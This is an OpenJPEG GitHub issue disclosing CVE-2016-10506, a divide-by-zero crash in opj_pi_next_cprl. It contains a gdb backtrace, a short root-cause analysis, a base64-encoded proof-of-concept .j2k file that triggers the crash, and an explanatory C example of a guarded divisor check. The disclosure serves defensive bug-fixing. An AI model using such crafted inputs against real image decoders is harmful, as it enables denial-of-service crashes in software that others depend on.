
[CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) #732

Closed
trylab opened this issue Mar 28, 2016 · 1 comment

Comments


trylab commented Mar 28, 2016


Testing Environment

Ubuntu + OpenJPEG (GitHub master, 2016/03/28)


Exception Information

username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/002.j2k
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/002.j2k

Program received signal SIGFPE, Arithmetic exception.
0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526
526 if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) ||
((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){

(gdb) p comp->dx
$1 = 2
(gdb) p rpx
$2 = 31

(gdb) bt
#0  0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526
#1  0xb7fbc4cc in opj_pi_next (pi=0x8090ec0)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:1871
#2  0xb7fc0b8d in opj_t2_decode_packets (p_t2=0x8090878, p_tile_no=0, p_tile=0x80658d0,
    p_src=0x80668d8 "\337\aV", p_data_read=0xbfff9dec, p_max_len=49,
    p_cstr_index=0x8061d68, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/t2.c:412
#3  0xb7fc6368 in opj_tcd_t2_decode (p_tcd=0x8065890, p_src_data=0x80668d8 "\337\aV",
    p_data_read=0xbfff9dec, p_max_src_size=225, p_cstr_index=0x8061d68, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/tcd.c:1552
#4  0xb7fc5d17 in opj_tcd_decode_tile (p_tcd=0x8065890, p_src=0x80668d8 "\337\aV",
    p_max_length=225, p_tile_no=0, p_cstr_index=0x8061d68, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/tcd.c:1291
#5  0xb7fa832a in opj_j2k_decode_tile (p_j2k=0x8060298, p_tile_index=0,
    p_data=0x80664c8 "", p_data_size=128, p_stream=0x8060170, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:8125
#6  0xb7fac369 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:9745
#7  0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,
    p_stream=0x8060170, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:7341
#8  0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,
    p_image=0x8065cc0, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:9943
#9  0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,
    p_image=0x8065cc0, p_manager=0x80601e4)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/jp2.c:1487
#10 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8065cc0)
    at /home/username/Desktop/openjpeg/src/lib/openjp2/openjpeg.c:412
#11 0x0804c2c0 in main (argc=5, argv=0xbffff124)
    at /home/username/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330

Simple Analysis

The value of comp->dx is 2 and the value of rpx is 31.
The value evaluated from (OPJ_INT32)(comp->dx << rpx) is 0 (2<<31 == 0).
The code pi->x%(OPJ_INT32)(comp->dx<<rpx) will cause a divide-by-zero exception (SIGFPE).


Proof-of-Concept file

Please decode the following content with the base64 algorithm.
Then save the decoded content to a .j2k file to generate the PoC.

AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAAAtanAyaAAAABZpaGRyAAAAIAAAACAA
AweHAAAAAAAPY29scgEAAAAAABAAAAFnanAyY/9P/1EALwAAAAAAAQAAACAAAAAAAAAAAIAAACAA
AAAgAAAAAAAAAAAAAwcCAQcBAYoBAf9SAAwABAABAREEBIAB/1wABEBA/2QAJQABQ3JlYXRlZCBi
eSBPcGVuSlBFRyB2ZXJzaWZ0eXAuMS4w/5AACgAAAAAA7wAB/5PfB1YANB/WzgwnT0scoB/vuZfg
c1PvCOOcZjXu94sFdFbBplUpDNQKo/J/xlMus9LPf6OB3S2g7cWVduNF1Jaz7rIDsiUuZP97i6v6
AKLEZkELDIYYc/9zmmka8yiifaZFEnVtgpHmcWvWIj909OzjqMTdl/xjGiEA30lKlsnQgHvkAAAA
DCQlU8IGCRzPVltBDquXVV1SKEgCZ6AAAL//MDWwLWWTjY66dD2zcDL4QNwgyHZAed8ygGb/NYsD
EkIdgqz2vhAr2q6hLHANUHiJLHTG3LUbzHETySr/f/9//3//2Q==


Credit

This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

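The report above shows the failure mode at pi.c:526: with comp->dx = 2 and rpx = 31 the shift comp->dx << rpx no longer fits in 32 bits, the divisor of the % operation becomes 0, and the CPU raises SIGFPE. The following C example is added here to illustrate that mechanism and one way to guard against it; it is not OpenJPEG code and it is not the project's fix (d27ccf0). The function names (truncated_shift32, cprl_step_divisor, cprl_x_is_precinct_start) and the simplified signature that passes the iterator fields as plain arguments are this example's own assumptions. The predicate mirrors the two-part test quoted from pi.c:526, computed in 64 bits, and rejects any resolution/level combination whose shifts would not fit in an OPJ_INT32 before the modulo is evaluated.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef int32_t  OPJ_INT32;
typedef uint32_t OPJ_UINT32;

/* Shows what the reporter observed: a 32-bit shift of dx by rpx, truncated to
 * 32 bits (done here via uint64 -> uint32, which is well-defined in C).
 * truncated_shift32(2, 31) == 0, which is exactly the divisor that faults. */
OPJ_UINT32 truncated_shift32(OPJ_UINT32 dx, OPJ_UINT32 rpx)
{
    return (OPJ_UINT32)((uint64_t)dx << rpx);
}

/* Hardened divisor computation (example code, not OpenJPEG's).
 * Computes dx << rpx in 64 bits, refuses shifts of 31 or more (they would
 * reach or overflow the sign bit of an OPJ_INT32) and any result that does
 * not fit in OPJ_INT32 or is zero.  Returns false when the divisor is unusable. */
static bool cprl_step_divisor(OPJ_UINT32 dx, OPJ_UINT32 rpx, OPJ_INT32 *out)
{
    if (rpx >= 31) {
        return false;                 /* 2 << 31 is the reporter's case */
    }
    uint64_t wide = (uint64_t)dx << rpx;
    if (wide == 0 || wide > (uint64_t)INT32_MAX) {
        return false;                 /* would truncate (possibly to 0) in 32 bits */
    }
    *out = (OPJ_INT32)wide;
    return true;
}

/* Example equivalent of the test at pi.c:526:
 *   (x % (dx << rpx) == 0) || ((x == tx0) && ((trx0 << levelno) % (1 << rpx)))
 * Returns  1 when the predicate holds, 0 when it does not, and -1 when the
 * shifts are out of range for this component (a caller would skip the
 * resolution level instead of dividing).  In the real iterator rpx = pdx + levelno,
 * so rpx < 31 also bounds levelno; the 64-bit arithmetic covers trx0 << levelno. */
int cprl_x_is_precinct_start(OPJ_INT32 x, OPJ_INT32 tx0, OPJ_INT32 trx0,
                             OPJ_UINT32 levelno, OPJ_UINT32 dx, OPJ_UINT32 rpx)
{
    OPJ_INT32 divisor;
    if (!cprl_step_divisor(dx, rpx, &divisor) || levelno > rpx) {
        return -1;
    }
    if (x % divisor == 0) {
        return 1;
    }
    if (x == tx0) {
        int64_t shifted = (int64_t)trx0 << levelno;   /* fits: levelno <= rpx < 31 */
        int64_t mask    = (int64_t)1 << rpx;
        if (shifted % mask != 0) {
            return 1;
        }
    }
    return 0;
}

int main(void)
{
    /* Constructed inputs: the reporter's values first, then a benign case. */
    printf("2 << 31 truncated to 32 bits = %u\n", truncated_shift32(2u, 31u));
    printf("reporter's case (dx=2, rpx=31): %d (expect -1, no division attempted)\n",
           cprl_x_is_precinct_start(0, 0, 0, 0u, 2u, 31u));
    printf("benign case (x=16, dx=2, rpx=3): %d (expect 1)\n",
           cprl_x_is_precinct_start(16, 0, 0, 1u, 2u, 3u));
    return 0;
}
```

The point of the guard is ordering: the divisor is validated (non-zero, representable) before the % executes, so a malformed codestream yields a skipped level or a decode error rather than a process-killing SIGFPE. Any real fix also has to apply the same reasoning to the matching comp->dy << rpy expression on the y axis.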
@trylab trylab changed the title division-by-zero (SIGFPE) error in opj_pi_next_cprl function in (line 526 of pi.c) division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) Mar 28, 2016
@malaterre malaterre added this to the OPJ v2.1.2 milestone Sep 20, 2016
@detonin detonin modified the milestones: OPJ v2.1.2, OPJ v2.1.3 Sep 29, 2016

rouault commented Jul 26, 2017

Fixed per d27ccf0

@rouault rouault closed this as completed Jul 26, 2017
@trylab trylab changed the title division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) [CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) Aug 30, 2017